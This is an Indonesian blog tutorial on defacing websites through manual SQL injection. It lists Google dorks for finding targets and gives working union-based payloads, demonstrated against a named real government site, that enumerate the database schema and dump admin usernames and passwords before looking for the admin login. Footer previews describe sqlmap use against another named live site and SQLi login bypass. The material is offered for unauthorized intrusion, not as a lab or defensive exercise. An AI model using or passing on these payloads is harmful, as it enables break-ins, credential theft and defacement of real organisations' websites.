tutorial deface sql injection

-


Pada Tutorial Kali ini ,Saya akan Share Tutorial Deface Sql Manual
dork : 
- inurl:/staff.php?id=
- inurl:/news.php?id=
kembangin sendiri gan.

Nah Langsung Aja Karena Saya Udah Nemu Situs Yang Vuln Sql ,Oh iya Untuk Mengetahui Vuln Atau Tidak Kalian Hanya Perlu Masukan tanda ( ' ) di belakang angka Id nya, Contoh :
http://www.utama.tegalkab.go.id/artikel.php?id=113' Nah Kek gitu deh, maka muncul You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1


jika sudah ketemu ,kalian tinggal masukan +order+by+1--+- ,Jadinya :
http://www.utama.tegalkab.go.id/artikel.php?id=113+order+by+1--+-
Kalian Terusin Sampai Ketemu Error ,jadinya
http://www.utama.tegalkab.go.id/artikel.php?id=113+order+by+1--+- => Ga error
http://www.utama.tegalkab.go.id/artikel.php?id=113+order+by+2--+- Ga error
http://www.utama.tegalkab.go.id/artikel.php?id=113+order+by+3--+- Ga error 
Sampai eror ya gan, 




Nah disini saya eror di http://www.utama.tegalkab.go.id/artikel.php?id=113+order+by+9--+- Maka di Pastikan Table nya ada 8, Jika Sudah Gitu Kalian Tinggal ganti +order+by dengan +union+select,jangan lupa di kasih tanda (-) di depan angka id.


jadinya : http://www.utama.tegalkab.go.id/artikel.php?id=-1+union+select+3--+- karena tadi table nya ada 8 http://www.utama.tegalkab.go.id/artikel.php?id=1+union+select+1,2,3,4,5,6,7,8--+- .Maka Akan Terlihat angka Ajaib Nya.



Saya akan pilih Angka Dua Aja Biar Mesra wkwkwk.Sekarang Kita masukan inject nya .
inject : (select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)
Masukan Pas di angka yang muncul Tadi ,


Jadinya : http://www.utama.tegalkab.go.id/artikel.php?id=-1+union+select+1,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x),3,4,5,6,7,8,9,10--+- Nah Disini Kalian Akan Lihat Banyak Table Table, Carilah Table Yang ada username dan password nya, kalo gak admin.


Nah Jika Sudah Lihat, Kalian Tinggal Dump istilahnya, Atau Buka Table Caranya Dengan Masukan Inject : /*!50000(SELECT+GROUP_CONCAT(username,0x3a,password+SEPARATOR+0x3c62723e)+FROM+utenti)*/ 

Disini user dan password saya di Table admin.dan nama table adminnya admin_username. dan passwordnya admin_password. Jadi kalian edit inject nya jadi : /*!50000(SELECT+GROUP_CONCAT([user_id],0x3a,[user_pw]+SEPARATOR+0x3c62723e)+FROM+[securityTab])*/
Yang Saya Tandai [ ] Yang Harus Kalian Ganti.

Maka Jadinya : http://www.utama.tegalkab.go.id/artikel.php?id=-1+union+select+1,/*!50000(SELECT+GROUP_CONCAT(admin_username,0x3a,admin_password+SEPARATOR+0x3c62723e)+FROM+admin)*/,3,4,5,6,7,8,9,10--+-
Nanti Saat Kalian Buka ,Akan Muncul user + password .
                                                                               
Tinggal kalian cari admin login nya hohoho :v

Comments

Post a Comment

Popular posts from this blog

Cara deface Sqlmap live target

-
Image
      Kali ini ane mau posting tentang deface, Yup cara deface dengan SQLMAP di Windows, oke langsung simak aja tutorial nya   Alat perang : > Sqlmap > Python >Google Dork    yng pertama, instal dulu python nya, lalu taro file SQLMAP nya di C:/sqlmap buka CMD, ente pergi ke direktori SQLMAP yang ada di  C:/sqlmap, dengan perintah> cd C:/sqlmap lalu ketikan perintah >sqlmap.py untuk menjalankan SQLMAP  Lalu ketikan Perintah> sqlmap.py -u https://target.com --dbs perintah ini untuk melihat isi database  Contoh:> sqlmap.py -u  https://www.bransonparksandrecreation.com/page.php?id=38  --dbs nah, ada 3 database di situs  https://www.bransonparksandrecreation.com/ Ane pilih database blrpwp, masukan perintah > sqlmap.py -u https://target.com -D nama_db --tables Contoh:>sqlmap.py -u https://www.bransonparksandrecreation.com/page.php?id=38 -D blrpwp --tables ada 34 tables didalem database blrpwp Skrng cari tabel admin/user/auth/login,dll yng b
Read more

Mengapa terjadi bypass admin??

-
Image
Mengapa Terjadi Bypass Admin? @Copyright by  MDaffa15ev Hehe, nyoba cari” di  db-exploit.com/papers  ada post yang menarik judulnya ” [Indonesian] Simple Technique for SQLi Form Login Bypass” buatan si haripinter. Waktu baca” lumayan menarik :V,  bagaimana kok bisa terjadi bypass admin? Ini penjelasan sederhananya. Konten : 1. Pendahuluan 2. Sekilas tentang SQLi pada Form Login 3. Contoh Serangan 4. Penanggulangan Sederhana #1. Pendahuluan SQL Injection merupakan salah teknik eksploitasi web yang cukup lama, namun hingga saat ini teknik tersebut masih cukup mumpuni dan efektif untuk dilakukan. Buktinya saat ini masih ada saja (dan banyak) website yang mengidap penyakit vuln terhadap serangan SQL Injection. Inti dari penyebab bug ini yaitu terletak pada si pembuat web (web programmer), anggap saja ada kesalahan logika berpikir atau ketidaktahuaannya dalam membuat website yang aman. Saya tekankan sekali lagi, masalah bug ini terletak pada diri
Read more